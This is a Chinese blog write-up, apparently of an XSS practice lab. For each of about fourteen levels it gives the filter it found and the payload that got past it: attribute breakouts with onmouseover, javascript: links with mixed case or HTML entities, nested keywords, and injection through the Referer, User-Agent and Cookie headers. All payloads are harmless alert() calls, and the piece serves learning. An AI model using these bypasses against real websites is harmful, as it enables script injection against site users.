xss挑戰(zhàn)賽

第一關(guān)

無過濾,直接使用<script>alert(1)</script>


1

第二關(guān)

'';!--"<XSS>=&{()}進行測試發(fā)現(xiàn)有兩個輸出點,第一個輸出點進行了html實體化。
![2(http://upload-images.jianshu.io/upload_images/5858942-6f09d0839c1b6937.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
閉合掉value后使用新屬性執(zhí)行js(在火狐上onload無法執(zhí)行 )
" onmouseover="alert('test')

第三關(guān)

兩處都用htmlspecialchars函數(shù)處理了,但htmlspecialchars函數(shù)默認不處理引號,所以第二處可以進行閉合引入新屬性。
' onmouseover='alert(1)

第四關(guān)

4

可以看出只是將單引號變?yōu)榱穗p引號。閉合后添加新屬性:
" onmouseover="alert(1)

第五關(guān)

可以看出破壞了onmouseover標簽,但輸出點2沒有進行任何過濾。

5

閉合input標簽后后用a標簽和javascript 偽協(xié)議繞過。
"><a href=javascript:alert(2)>

第六關(guān)

6

可以看出herf也被破壞了,但測試發(fā)現(xiàn)通過修改大小寫可以繞過(on*標簽不可以)
" ><a hRef=javascript:alert(2)>

第七關(guān)

可以看出是將關(guān)鍵詞過濾為空,考慮嵌套關(guān)鍵詞
" ><scripscriptt>alert(1)</scriscriptpt>

第八關(guān)

輸出點在a標簽的href屬性中且引號被過濾無法進行閉合,考慮使用javascript偽協(xié)議,但關(guān)鍵詞被過濾,因為在href屬性中,所以用html編碼繞過。
&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x32;&#x29;

第九關(guān)

友情鏈接必須包含http://,javascript被過濾,將偽協(xié)議代碼html編碼并在后面注釋上http://
&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x32;&#x29;//http://

第十關(guān)

這關(guān)就有點坑了,一開始那個輸入點沒人任何辦法繞過,發(fā)現(xiàn)有隱藏的輸入點

10

測試后發(fā)現(xiàn)t_sort參數(shù)有輸出點且無過濾。
keyword=1&t_sort=1" onmouseover='alert(1)'(如果沒有將input改為可見可以使用其他on*事件)

第十一關(guān)

進入時發(fā)現(xiàn)有一個隱藏的input的值為第十關(guān)的url,可以確定為refer,測試其他輸入點均被過濾且無法繞過,嘗試修改Referer為xss語句,成功繞過
Referer: " onmouseover="alert(1)

第十二關(guān)

這次又顯示瀏覽器信息,這次修改User-Agent
User-Agent: " onmouseover="alert(2)

第十三關(guān)

這次的輸入點到了cookie中,修改cookie
Cookie: user=" onmouseover="alert(1);

第十四關(guān)

這關(guān)好像已經(jīng)失效了,是關(guān)于exif的

第十五關(guān)

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務。

相關(guān)閱讀更多精彩內(nèi)容

  • 忘記啥時候下載的練習題,無聊拿出來做做。打開后隨便點一下進入第一關(guān): 第一關(guān) 源碼: 分析:沒有做任何過濾payl...
    Dale丶閱讀 8,906評論 3 11
  • 本章轉(zhuǎn)載自新浪博客網(wǎng)友:blog.sina.com.cn/s/blog_7f5571aa0102w2tv.html...
    czboy閱讀 1,590評論 0 11
  • 想你了…… 好像很久沒聽到過一絲你的消息,甚至空氣也沒有……雖然我知道,不打擾你,大概才能讓你真正安心做自己的...
    晨定閱讀 142評論 0 0
  • 文/沫雪三千 舍不得,舍不得你那永遠充滿陽光的臉 舍不得,舍不得你那雙撥動我心弦的眼 舍不得,舍不得你那抹動人心魄...
    沬雪三千閱讀 317評論 0 1
  • // 定義一個人的類 class Person:NSObject { // 給類擬定兩個屬性 var name:S...
    唯一的信仰閱讀 614評論 0 0

友情鏈接更多精彩內(nèi)容